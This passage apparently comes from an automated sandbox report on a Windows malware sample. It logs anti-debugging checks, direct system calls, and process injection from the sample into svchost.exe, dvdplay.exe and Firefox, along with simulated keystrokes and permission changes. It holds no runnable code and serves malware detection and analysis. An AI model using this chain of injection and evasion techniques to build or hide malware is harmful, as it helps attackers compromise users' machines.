            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Windows\SysWOW64\dvdplay.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\dvdplay.exe; Section loaded: NULL target: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe protection: read write
            Source: C:\Windows\SysWOW64\dvdplay.exe; Section loaded: NULL target: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\dvdplay.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\dvdplay.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\dvdplay.exe; Thread register set: target process: 3140
            Source: C:\Windows\SysWOW64\dvdplay.exe; Thread APC queued: target process: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 2964008
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_00436CD7 LogonUserW
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe; Process created: C:\Windows\SysWOW64\dvdplay.exe "C:\Windows\SysWOW64\dvdplay.exe"
            Source: C:\Windows\SysWOW64\dvdplay.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: H1CYDJ8LQe.exe, SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
